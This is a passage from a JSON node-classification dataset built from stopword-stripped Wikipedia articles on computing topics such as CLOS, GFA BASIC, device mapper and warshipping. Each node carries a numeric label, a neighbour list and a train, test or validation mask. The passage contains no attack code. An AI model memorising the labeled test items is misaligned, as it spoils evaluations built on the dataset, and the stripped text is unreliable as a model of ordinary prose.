    "text": "Open_Grid_Services_Infrastructure:open grid services infrastructure open grid services infrastructure ogsi published global grid forum ggf proposed recommendation june 2003 intended provide infrastructure layer open grid services architecture ogsa ogsi takes statelessness issues along others account essentially extending web services accommodate grid computing resources transient stateful web services groups started integrate approaches capturing state web services resource framework wsrf release gt4 open source tool kit migrating back pure web services implementation rather ogsi via integration wsrf ogsi former set extensions web services provide stateful interactions -- would say point obsolete jay unger said model used globus toolkit 3.0 replaced wsrf ws-security broader set web services standards ogsa focuses specific service definition areas execution components execution modeling grid data components information virtualization still important role play evolution standards open source tool kits like globus",
    "neighbors": [
      11353,
      5956,
      158,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 9877,
    "label": 9,
    "text": "Common_Lisp_Object_System:common lisp object system common lisp object system clos facility object-oriented programming part ansi common lisp clos powerful dynamic object system differs radically oop facilities found static languages c++ java clos inspired earlier lisp object systems mit flavors commonloops although general either originally proposed add-on clos adopted part ansi standard common lisp adapted lisp dialects eulisp emacs lisp basic building blocks clos classes methods instances classes generic functions clos provides macros define codice_1 codice_2 codice_3 instances created function codice_4 classes multiple superclasses list slots member variables c++/java parlance special metaclass slots allocated class instances class share slot instance slot name value slot accessed name using function codice_5 additionally special generic functions defined write read values slots slot clos class must unique name clos multiple dispatch system means methods specialized upon required arguments oo languages single-dispatch meaning methods specialized first argument another unusual feature methods belong classes classes provide namespace generic functions methods methods defined separately classes special access e.g self protected class slots methods clos grouped generic functions generic function object callable like function associates collection methods shared name argument structure specialized different arguments since common lisp provides non-clos classes structures built-in data types numbers strings characters symbols ... clos dispatch works also non-clos classes clos also supports dispatch individual objects eql specializers clos default support dispatch common lisp data types example dispatch work fully specialized array types types introduced codice_6 however common lisp implementations provide metaobject protocol allows generic functions provide application specific specialization dispatch rules dispatch clos also different oo languages dispatch mechanism works runtime adding removing methods thus may lead changed effective methods even generic function called arguments runtime changing method combination also may lead different effective methods example like oo systems dynamic languages clos enforce encapsulation slot accessed using codice_5 function via optionally auto-generated accessor methods access via codice_5 know name slot cl programmers use language package facility declare functions data structures intended export apart normal primary methods also codice_9 codice_10 codice_11 auxiliary methods former two invoked prior primary method particular order based class hierarchy codice_11 method control whether primary method executed additionally programmer specify whether possible primary methods along class hierarchy called one providing closest match standard method-combination provides primary around methods explained method-combinations method types new simple complex method-combinations method types defined clos allows multiple inheritance default order methods executed multiple inheritance correct programmer may resolve diamond inheritance problems specifying order method combinations clos dynamic meaning contents also structure objects modified runtime clos supports changing class definitions on-the-fly even instances class question already exist well changing class membership given instance codice_13 operator clos also allows one add redefine remove methods runtime circle-ellipse problem readily solved clos oop design patterns either disappear qualitatively simpler clos prototype language classes must defined objects instantiated members class outside ansi common lisp standard widely implemented extension clos called metaobject protocol mop mop defines standard interface underpinnings clos implementation treating classes slot-descriptions generic-functions methods instances metaclasses allows definition new metaclasses modification clos behavior flexibility clos mop prefigures aspect-oriented programming later developed engineers gregor kiczales mop defines behavior whole object system set protocols defined terms clos thus possible create new object-systems extending changing provided clos functionality book art metaobject protocol describes use implementation clos mop various common lisp implementations slightly different support meta-object protocol closer project aims provide missing features flavors successor new flavors object system mit lisp machine large parts lisp machine operating systems many applications use flavors new flavors flavors introduced multiple inheritance mixins among features flavors mostly obsolete though implementations common lisp exist flavors using message passing paradigm new flavors introduced generic functions commonloops successor loops xerox interlisp-d commonloops implemented common lisp portable implementation called portable commonloops pcl first implementation clos pcl widely ported still provides base clos implementation several common lisp implementations pcl implemented mostly portable common lisp system dependent parts power expressivity clos well historical availability tinyclos simplified portable clos implementation written gregor kiczales use scheme clos-like mop-based object systems become de facto norm lisp dialect implementations well finding way languages oop facilities",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      5677,
      3119,
      1591,
      2105,
      6201,
      3132,
      6717,
      6718,
      8258,
      8771,
      10819,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      3176,
      2666,
      2667,
      10347,
      5751,
      7805,
      2691,
      1159,
      9865,
      9875,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      7896,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      242,
      8435,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      10012,
      3869,
      2335,
      2849,
      5420,
      7981,
      7983,
      2352,
      305,
      10547,
      11574,
      311,
      6969,
      8002,
      11589,
      11083,
      3408,
      6994,
      1365,
      2392,
      6493,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      2438,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      5564,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      8173,
      7670,
      11255,
      2556,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 9878,
    "label": 8,
    "text": "Win–loss_analytics:win–loss analytics win–loss analytics involves identifying analyzing reasons visitor website n't persuaded engage desired action conversion information allows web teams improve website navigation content identify individuals likely convert improve marketing efforts determining one person engaged desired action another long topic interest sales measurement conversion always possible sales data contrast marketing mostly concerned targeting masses results marketing traditionally difficult accurately measure internet much easier marketers collect data analysis evaluation order understand demonstrate effectiveness ineffectiveness efforts make changes improve thus yielding best result specific marketing campaign win-loss analytics web analytics tools existed since early days internet ubiquitous tools provide bird eye view website traffic information gathered allows webmasters make informed decisions making changes order improve website win–loss analytics tools track individual perspectives visitor uncovering visitor products qualified well persuaded n't convert win loss programs typically focus different elements buying process including gathering buyer feedback solution sold whether product service buyer perception effectiveness sales representative sales team buyer perceptions selling vendor overall firm reputation long-term financial viability price categories broken greater detail refined feedback example questions product service might include intuitiveness user interface effectiveness specific features functionality",
    "neighbors": [
      3688,
      6576
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9879,
    "label": 0,
    "text": "EXtended_WordNet:extended wordnet extended wordnet project university texas dallas funded national science foundation aims improve wordnet semantically parsing glosses thus making information contained definitions available automatic knowledge processing systems freely available bsd style license although updated since november 2004 recent version based wordnet 2.0 still remains useful resource database available set four xml files one verbs adverbs nouns adjectives following information extracted glosses example following information available synset excellent first-class fantabulous gloss word sense disambiguation parse tree logic form gloss first tagged using brill tagger glosses parsed using charniak parser in-house collins style parser parsed gloss assigned level quality page currently available",
    "neighbors": [
      416,
      1072,
      9288,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 9880,
    "label": 6,
    "text": "The_Unarchiver:unarchiver unarchiver proprietary freeware data decompression utility supports formats archive utility formerly known bomarchivehelper built-in archive unpacker program macos also handle filenames various character encodings created using operating system versions use character encodings latest version requires mac os x lion higher unarchiver compress files corresponding command line utilities codice_1 codice_2 run microsoft windows linux macos",
    "neighbors": [
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      3114,
      10027,
      7983,
      823,
      6713,
      576,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      237,
      1646,
      8304,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "None"
  },
  {
    "node_id": 9881,
    "label": 9,
    "text": "GFA_BASIC:gfa basic gfa basic dialect basic programming language frank ostrowski name derived company gfa systemtechnik gmbh distributed software mid-1980s 1990s enjoyed popularity advanced basic dialect mostly superseded several programming languages official support ended early 2000s gfa basic developed frank ostrowski gfa systemtechnik gmbh later gfa software german company kiel düsseldorf gfa acronym gesellschaft für automatisierung company automation gave name software first gfa basic version released 1986 mid late 1980s became popular atari st home computer range since atari st basic shipped primitive later ports commodore amiga dos windows marketed version 2.0 popular release gfa basic offered many advanced features compared alternatives gfa basic 3.0 included improvements like support user-defined structures agglomerated data types final released version 3.6 around 2002 gfa software ceased gfa basic activities shut mailinglist website 2005 due missing official support availability gfa basic user community took support installed communication infrastructure version 2.0 popular release gfa basic modern programming language time line numbers used one line equivalent one command greatly simplify maintenance long listings ide even allowed code folding reasonable range structured programming commands — procedures local variables parameter passing value reference loop constructs etc modularization rudimentary making gfa basic 2.0 best suited small medium-sized projects gfa basic interpreter compact reasonably fast shipped runtime could distributed freely one programs compiler made available execution speed could increased approximately factor 2 gfa basic allowed extreme optimisations execution speed supporting direct assembler-level calls even ability embed sections assembler code directly within basic source code gfa basic integrated neatly gem tos atari st operating system providing menus dialog boxes mouse control see wimp interface although source code usually stored tokenized version save room disk pieces code could also saved ascii form made possible set reusable libraries tokenized source files benefit ways — instance gfa basic allowed users include binary data basic code via inline statement could even integrated gfa assembler allow users develop machine code programs inside inline statements order accelerate particular areas program also meant basic interpreter later compiler n't need tokenise program loaded would significant load-time overhead larger gfa basic programs written editions gfa manual printed black ink red paper attempt thwart photocopying bootlegging effectiveness tactic questionable manual returned usual black-on-white format complaints colour blind users proliferation re-typed copies internet gfa basic microsoft windows included thorough implementation windows api calls although product number technical advantages popular products combination easy language robust architecture fast compiled reliable code n't achieve great success windows market software professionals wanted high-performance code tended stay technical languages regard basics inferior professionals n't problem basic number well-established software tool vendors microsoft borland actively promoting new visual programming systems visual basic allowed users create windows dialog boxes populated standard components text buttons frame outlines help drag-and-drop interface object-oriented editing one advantages gfa basic windows compiler sold separately could create stand-alone .exe files also included relatively easy option creating dynamic link library .dll files windows allowed user write test routines within gfa basic export functions windows .dll file access pre-compiled functions within tools programs visual basic 3.0 unable produce compiled code feature allowed gfa basic used number-crunching add-on product visual basic writing high-speed routines applications database sorting media signal processing would impractical then-current version visual basic gfa basic company recognition product recognition factors companies microsoft borland united states market simple text-based code creation system lacked exciting new visual user interfaces better-known competitors although gfa basic windows developed include support visual basic components use gfa technical visual basic without large marketing budget clear reason journalists write gfa basic windows remained comparatively obscure product éric chahi wrote game editor gfa basic create game another world including scene design game scripting game engine polygon rendering music done assembler editor used make ports game including consoles collector edition windows released 2006 dashboard sustainability coded mostly gfa basic source 500kb plus 100kb assembly mainly accessing 32-bit windows functions",
    "neighbors": [
      5635,
      3718,
      7691,
      1805,
      6797,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      7849,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      963,
      8262,
      10750,
      712,
      9166,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      2290,
      5747,
      2804,
      759,
      7032,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 9882,
    "label": 2,
    "text": "Device_mapper:device mapper device mapper framework provided linux kernel mapping physical block devices onto higher-level virtual block devices forms foundation logical volume manager lvm software raids dm-crypt disk encryption offers additional features file system snapshots device mapper works passing data virtual block device provided device mapper another block device data also modified transition performed example case device mapper providing disk encryption simulation unreliable hardware behavior article focuses device mapper implementation linux kernel device mapper functionality also available netbsd dragonfly bsd applications like lvm2 enterprise volume management system evms need create new mapped devices talk device mapper via codice_1 shared library turn issues ioctls codice_2 device node configuration device mapper also examined configured interactivelyor shell scriptsby using utility two userspace components source code maintained alongside lvm2 source functions provided device mapper include linear striped error mappings well crypt multipath targets example two disks may concatenated one logical volume pair linear mappings one disk another example crypt target encrypts data passing specified device using linux kernel crypto api following mapping targets available following linux kernel features projects built top device mapper",
    "neighbors": [
      2051,
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      10785,
      3618,
      9762,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      576,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      97,
      6244,
      5222,
      10856,
      8298,
      4207,
      7794,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      2179,
      7812,
      10883,
      8326,
      6797,
      4238,
      7821,
      10382,
      2195,
      10387,
      9366,
      2711,
      6296,
      6808,
      7325,
      1694,
      9887,
      2723,
      8364,
      1199,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      4801,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      4841,
      7403,
      9455,
      10482,
      5363,
      2804,
      2294,
      8438,
      8439,
      2809,
      2811,
      7938,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      1813,
      792,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      6988,
      10063,
      5457,
      11601,
      4438,
      5975,
      11095,
      2910,
      3422,
      10590,
      9571,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      7057,
      11155,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      11179,
      9646,
      1456,
      11184,
      1972,
      6075,
      9660,
      6078,
      9151,
      9667,
      1990,
      8136,
      457,
      6601,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      5619,
      2036,
      5620,
      8186,
      10235,
      2044,
      10237
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9883,
    "label": 7,
    "text": "Shared_disk_architecture:shared disk architecture shared disk architecture sd distributed computing architecture disks accessible cluster nodes contrasts shared nothing architecture nodes sole access distinct disks multiple processors access disks directly via intercommunication network every processor local memory shared disk two advantages shared memory firstly processor memory memory bus bottleneck secondly system offers simple way provide degree fault tolerance",
    "neighbors": [
      4817,
      9782
    ],
    "mask": "Train"
  },
  {
    "node_id": 9884,
    "label": 4,
    "text": "Trusted_third_party:trusted third party cryptography trusted third party ttp entity facilitates interactions two parties trust third party third party reviews critical transaction communications parties based ease creating fraudulent digital content ttp models relying parties use trust secure interactions ttps common number commercial transactions cryptographic digital transactions well cryptographic protocols example certificate authority ca would issue digital identity certificate one two parties next example ca becomes trusted-third-party certificates issuance likewise transactions need third party recordation would also need third-party repository service kind another 'trusted means system need trusted act interests option either involuntarily act interest 'trusted also means way verify system operating interests hence need trust corollary system verified operate interests would need trust shown operate interests one would use suppose alice bob wish communicate securely – may choose use cryptography without ever met bob alice may need obtain key use encrypt messages case ttp third party may previously seen bob person otherwise willing vouch key typically identity certificate belongs person indicated certificate case bob discussions third person often called trent trent gives alice uses send secure messages bob alice trust key bob trusts trent discussions simply assumed valid reasons course issue alice bob able properly identify trent trent someone impersonating trent arrange trustable third parties type unsolved problem long motives greed politics revenge etc. perform supervise work done entity provide potential loopholes necessary trust may leak problem perhaps unsolvable one ancient notorious large impersonal corporations make promises accuracy attestations correctness claimed public-key-to-user correspondence e.g. certificate authority part public key infrastructure changes little many environments strength trust weak weakest link infrastructure trusted ca breached whole chain trust broken 2011 incident ca diginotar broke trust dutch governments pki textbook example weaknesses system effects bruce schneier pointed 2013 mass surveillance disclosures third party fact ever trusted pgp cryptosystem includes variant ttp form web trust pgp users digitally sign identity certificates instructed confident person public key belong together key signing party one way combining get-together certificate signing nonetheless doubt caution remain sensible users careless signing others certificates trusting humans organizational creations risky example financial matters bonding companies yet find way avoid losses real world outside cryptography law many places makes provision trusted third parties upon whose claims one may rely instance notary public acts trusted third party authenticating acknowledging signatures documents ttp role cryptography much least principle certificate authority partially fills notary function attesting identity key owner whether party mentally aware apparent free duress certificate authority attest date signature",
    "neighbors": [
      513,
      1315,
      7075,
      517,
      7368,
      3178,
      10831,
      9744,
      9690,
      6098,
      503,
      8634,
      8283
    ],
    "mask": "Test"
  },
  {
    "node_id": 9885,
    "label": 4,
    "text": "IObit_Malware_Fighter:iobit malware fighter iobit malware fighter introduced 2004 anti-malware anti-virus program microsoft windows operating system windows xp later designed remove protect malware including trojans rootkits ransomware iobit malware fighter freeware version run alongside user existing anti-virus solution paid edition product comes anti-virus protection version 6 released 2018 product includes bitdefender engine commercial version along anti-malware engine new features latest release include improved user interface safe box feature protect specific folders unauthorized access mbr guard protects malicious attacks goldeneye/petya cryptocurrency mining scripts 2010 first beta iobit malware fighter 1.0 released public 2013 iobit malware fighter 2 released version iobit debuted cloud security component user upload file cloud determine whether malicious 2015 version 3 released 2016 version 4 added bitdefender anti-virus engine commercial edition 2017 version 5 released among new features anti-ransomware component version 6 released may 2018",
    "neighbors": [
      10756,
      2213,
      106,
      6797,
      7983,
      1970,
      10166,
      7515,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 9886,
    "label": 4,
    "text": "Warshipping:warshipping warshipping using physical package delivery service deliver attack vector target concept first described 2008 def con hacking convention robert graham david maynor part talk entitled “ bringing sexy back breaking style ” included various penetration testing methods implementation iphone box modified include larger battery powered jailbroken iphone first-generation iphone chosen attack based reported run-time 5 days coupled external battery whereas newer 3g iphones era would reportedly run 1½ days social engineering security pretext described would trick recipient believing iphone order explain shipment advancement low-power electronics thanks part maker culture greatly increased effectiveness methodology credible method attacking networks 2019 ibm x-force red coined name “ warshipping ” described attack platform included several low-cost components could combined shipped targets controlled remotely 2-3 weeks solar component also described allow devices run indefinitely aspects modern warshipping attack include following increasing use large online retailers contributes relevancy attack 2019 united states postal service reports deliver 484.8 million mailpieces per day name analogy wardriving wardialling",
    "neighbors": [
      3323,
      9732,
      7222
    ],
    "mask": "None"
  },
  {
    "node_id": 9887,
    "label": 2,
    "text": "Process_management_(computing):process management computing process management integral part modern-day operating system os os must allocate resources processes enable processes share exchange information protect resources process processes enable synchronization among processes meet requirements os must maintain data structure process describes state resource ownership process enables os exert control process modern operating system one instance program loaded memory time example one user could executing program user separate copies program loaded memory programs possible one copy loaded memory several users shared access execute program-code program said re-entrant processor instant executing one instruction one program several processes sustained period time assigning process processor intervals remainder become temporarily inactive number processes executed period time instead time called concurrent execution multiprogramming multitasking os system executing many processes concurrently multiprogramming requires processor allocated process period time de-allocated appropriate moment processor de-allocated execution process must done way restarted later easily possible two possible ways os regain control processor program ’ execution order os perform de-allocation allocation stopping one process starting restarting another process called context switch context change many modern operating systems processes consist many sub-processes introduces concept thread thread may viewed sub-process separate independent sequence execution within code one process threads becoming increasingly important design distributed client–server systems software run multi-processor systems common trait observed among processes associated computer programs alternate cpu cycles i/o cycles portion time required cpu cycles process executed i.e occupying cpu time required i/o cycles process using processor instead either waiting perform input/output actually performing input/output example reading writing file disk prior advent multiprogramming computers operated single-user systems users systems quickly became aware much time computer allocated single user processor idle user entering information debugging programs example computer scientists observed overall performance machine could improved letting different process use processor whenever one process waiting input/output uni-programming system n users execute programs individual execution times ... total time service n processes consecutively n users would however process consumes cpu cycles i/o cycles time process actually uses cpu small fraction total execution time process process time process spends using cpu br total execution time process i.e time cpu cycles plus i/o cycles carried executed completion process fact usually sum processor time used n processes rarely exceeds small fraction time execute one processes therefore uni-programming systems processor lay idle considerable proportion time overcome inefficiency multiprogramming implemented modern operating systems linux unix microsoft windows enables processor switch one process x another whenever x involved i/o phase execution since processing time much less single job runtime total time service n users multiprogramming system reduced approximately operating systems need ways create processes simple system designed running single application e.g. controller microwave oven may possible processes ever needed present system comes general-purpose systems however way needed create terminate processes needed operation four principal events cause process created operating system booted typically several processes created foreground processes interacts human user perform work background processes associated particular users instead specific function example one background process may designed accept incoming e-mails sleeping day suddenly springing life incoming e-mail arrives another background process may designed accept incoming request web pages hosted machine waking request arrives service request process creation unix linux done fork clone system calls several steps involved process creation first step validation whether parent process sufficient authorization create process upon successful validation parent process copied almost entirely changes unique process id parent process user-space new process gets user space many reasons process termination operating system ’ principal responsibility controlling execution processes includes determining interleaving pattern execution allocation resources processes one part designing os describe behaviour would like process exhibit simplest model based fact process either executed processor thus process may considered one two states running running operating system creates new process process initially labeled running placed queue system running state process portion exists main memory waits queue opportunity executed period time currently running process interrupted moved running state running state making processor available different process dispatch portion os select queue running processes one waiting processes transfer processor chosen process relabeled running state running state execution either begun new process resumed process interrupted earlier time model identify design elements os although two-state process management model perfectly valid design operating system absence blocked state means processor lies idle active process changes cpu cycles i/o cycles design make efficient use processor three-state process management model designed overcome problem introducing new state called blocked state state describes process waiting i/o event take place case i/o event mean use device signal another process three states model instant process one one three states single processor computer one process running state one instant many processes ready blocked states states associated queue processes processes entering system must go initially ready state processes enter running state via ready state processes normally leave system running state three states process occupies space main memory reason transitions one state another might obvious may clear three state model sufficient describe behavior processes given events extend model allow possible events sophisticated design particular use portion hard disk emulate main memory called virtual memory requires additional states describe state processes suspended main memory placed virtual memory disk course processes future time resumed transferred back main memory medium level scheduler controls events process suspended running ready blocked state giving rise two states namely ready suspend blocked suspend running process suspended becomes ready suspend blocked process suspended becomes blocked suspend process suspended number reasons significant arises process swapped memory memory management system order free memory processes common reasons process suspended one suspends execution debugging program system monitoring processes five-state process management model consider following transitions described next sections process system represented data structure called process control block pcb process descriptor linux performs function traveller passport pcb contains basic information job including process identification process uniquely identified user ’ identification pointer connecting descriptor process status indicates current status process ready running blocked ready suspend blocked suspend process state contains information needed indicate current state job accounting contains information used mainly billing purposes performance measurement indicates kind resources process used long contemporary processors incorporate mode bit define execution capability program processor bit set kernel mode user mode kernel mode also commonly referred supervisor mode monitor mode ring 0 kernel mode processor execute every instruction hardware repertoire whereas user mode execute subset instructions instructions executed kernel mode called kernel privileged protected instructions distinguish user mode instructions example i/o instructions privileged application program executes user mode perform i/o instead must request os perform i/o behalf system may logically extend mode bit define areas memory used processor kernel mode versus user mode mode bit set kernel mode process executing processor access either kernel user partition memory however user mode set process reference user memory space frequently refer two classes memory user space system space kernel supervisor protected space general mode bit extends operating system protection rights mode bit set user mode trap instruction also called supervisor call instruction instruction sets mode bit branches fixed location system space since system code loaded system space system code invoked via trap os completed supervisor call resets mode bit user mode prior return parts os critical correct operation execute kernel mode software generic system software application programs execute user mode fundamental distinction usually irrefutable distinction operating system system software part system executing kernel supervisor state called kernel nucleus operating system kernel operates trusted software meaning designed implemented intended implement protection mechanisms could covertly changed actions untrusted software executing user space extensions os execute user mode os rely correctness parts system software correct operation os hence fundamental design decision function incorporated os whether needs implemented kernel implemented kernel execute kernel supervisor space access parts kernel also trusted software parts kernel function implemented execute user mode access kernel data structures however advantage normally require limited effort invoke function kernel-implemented functions may easy implement trap mechanism authentication time call usually relatively expensive kernel code runs fast large performance overhead actual call subtle important point two techniques program executing user mode request kernel services operating systems designed one two facilities first assume user process wishes invoke particular target system function system call approach user process uses trap instruction idea system call appear ordinary procedure call application program os provides library user functions names corresponding actual system call stub functions contains trap os function application program calls stub executes trap instruction switches cpu kernel mode branches indirectly os table entry point function invoked function completes switches processor user mode returns control user process thus simulating normal procedure return message passing approach user process constructs message describes desired service uses trusted send function pass message trusted os process send function serves purpose trap carefully checks message switches processor kernel mode delivers message process implements target functions meanwhile user process waits result service request message receive operation os process completes operation sends message back user process distinction two approaches important consequences regarding relative independence os behavior application process behavior resulting performance rule thumb operating system based system call interface made efficient requiring messages exchanged distinct processes case even though system call must implemented trap instruction even though trap relatively expensive perform efficient message passing approach generally higher costs associated process multiplexing message formation message copying system call approach interesting property necessarily os process instead process executing user mode changes kernel mode executing kernel code switches back user mode returns os call hand os designed set separate processes usually easier design gets control machine special situations kernel simply collection functions executed users processes kernel mode even procedure-based operating system usually find necessary include least system processes called daemons unix handle situation whereby machine otherwise idle scheduling handling network",
    "neighbors": [
      2560,
      9224,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      3746,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      1776,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      5029,
      4521,
      9643,
      4525,
      11184,
      7601,
      2994,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      4075,
      10731,
      8687,
      6128,
      5105,
      5619,
      3066,
      5115,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9888,
    "label": 2,
    "text": "Xpeak:xpeak xpeak standard device management based xml platform agnostic initially focused financial applications restricted serves purpose apis like cen/xfs j/xfs restricted one operating system language since works client/server model using xml way homogenise communication application device services flexibility allows different parts whole business implemented different languages application various devices implemented java c++ still others device firmware designed based experiences cen/xfs j/xfs javapos instead using standards organization uses open source model develop architecture tools used project like base complete open source software solution named xpeaker way updated quickly openly users using internet means communication rather meetings requiring physical presence xpeak follows open source model participation project totally free moderated r open source foundation participated equal parts sun microsystems intecna initial code contribution responsibility cashware one leading companies devices connectivity use standards cen/xfs j/xfs xpeaker collection software projects integrally developed cashware philosophy open source commercialized dual license xpeaker public license commercial licence xpeaker includes following elements eclipse plugin permits made high level api access xpeak services xpeaking permits access said services different programming languages java c c++ c pascal",
    "neighbors": [
      5609,
      9665,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 9889,
    "label": 9,
    "text": "ARITH-MATIC:arith-matic arith-matic extension grace hopper a-2 programming language developed around 1955 arith-matic originally known a-3 renamed marketing department remington rand univac",
    "neighbors": [
      1864,
      4483,
      5277,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 9890,
    "label": 1,
    "text": "BrandZ:brandz brandz brand equity database managed marketing firm millward brown holds data 650,000 consumers professionals across 31 countries comparing 23,000 brands database used estimate brand valuations year since 2006 used generate list top 100 global brands credibility interbrand brandz league tables cast doubt article written marketing week mark ritson lack clear definitions valuation dates companies methodology raise questions subjectivity involved brand valuations part multinational advertising groups interbrand kantar millward brown also suffer risk objectivity transparency objectivity two requirements iso 10668 standard monetary brand valuations",
    "neighbors": [
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 9891,
    "label": 9,
    "text": "WSFN_(programming_language):wsfn programming language wsfn stands nothing interpreted programming language controlling robots created li-chen wang designed small possible tiny language similar wang earlier effort palo alto tiny basic wsfn first published dr. dobb journal september 1977 language consists primarily single-letter commands tell robot move certain directions commands perform tests basic mathematical operations grouped named macros produce complex programs original version also included code simulated robot cursor vdm-1 display graphically cromemco dazzler display today known turtle graphics extended wsfn implementation created atari 8-bit family home computers written harry stewart published atari program exchange 1981 addition supporting turtle graphics adds number commands control graphics sound capabilities platform offered beginner language emphasis graphics wsfn consists number single-letter commands control movement turtle commands repeated prefixing number instance codice_1 moves turtle forward one step codice_2 moves 25 steps codice_3 codice_4 make turtle turn one unit right left respectively also reset point codice_5orth step sizes turn units defined robot hardware set one pixel 45 degrees turtle graphics versions missing robot versions computer versions codice_6 returns turtle home center screen codice_7 clears previous drawing thus one draw square string instructions set drawing color black clears screen fills current color sets color white homes turtle resets turtle point north draws series four lines 25 steps long rotating 90 degrees one result white square lower-left corner center screen lists commands surrounded parentheses create macros instance square drawn placing code draw one side square inside parentheses calling four times macros called within macros instance code draws series eight squares offset 45 degrees rotating around center screen macros assigned name using codice_8efine command extended wsfn used codice_9 instead code defines macro named x clear screen reset drawing another z draws square uses draw rotating square example wsfn rudimentary math capabilities consisting single accumulator codice_10 incremented decremented codice_11 codice_12 letter codice_10 placed anywhere number could appear one make series squares grow larger incrementing accumulator 5 times step side-effect syntax codice_14 would set accumulator zero performs decrement instruction number likewise codice_15 doubles value accumulator program control equally rudimentary consisting number commands handled if/then/else structures basic form codice_16est command follows one two paths accumulator greater equal zero instance command causes turtle turn 90 degrees left accumulator non-zero 45 right zero variations codice_16 branching construct include codice_18 randomly jumps first second branch 50 time codice_19ensor tests contact sensor robot triggered extended wsfn modified codice_19 return color front turtle allowing hit detection previous drawing added codice_21dge test jumps right side macro turtle hit edge drawing area original wsfn lacks equivalent codice_21 instead wraps drawing area turtle re-appears opposite side screen extended wsfn supports style playfield wrapping option uses one-letter commands recursive syntax wsfn code exceedingly cryptic example wsfn program draw sierpiński curves note definition macro includes calls within key aspect wsfn concept language highly recursive nature makes programming self-similar patterns like fractals easy accomplish lines code key concept extended wsfn keyboard always active even macros running allows keyboard input interrupt running programs using technique one make macros moving turtle certain ways assign letters keyboard perform movements pressing different keys succession aided adding codice_23ait command places give user time respond drawing takes place original dr. dobbs article extended wsfn manual",
    "neighbors": [
      9714,
      7691,
      1029,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 9892,
    "label": 2,
